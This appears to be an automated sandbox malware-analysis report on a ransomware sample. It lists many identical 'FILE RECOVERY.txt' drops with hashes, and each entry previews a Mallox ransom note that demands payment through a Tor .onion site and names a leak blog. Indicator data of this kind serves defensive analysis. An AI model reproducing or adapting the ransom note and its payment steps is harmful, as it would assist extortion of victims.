                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApiGroup\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApi\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280810\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\280811\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
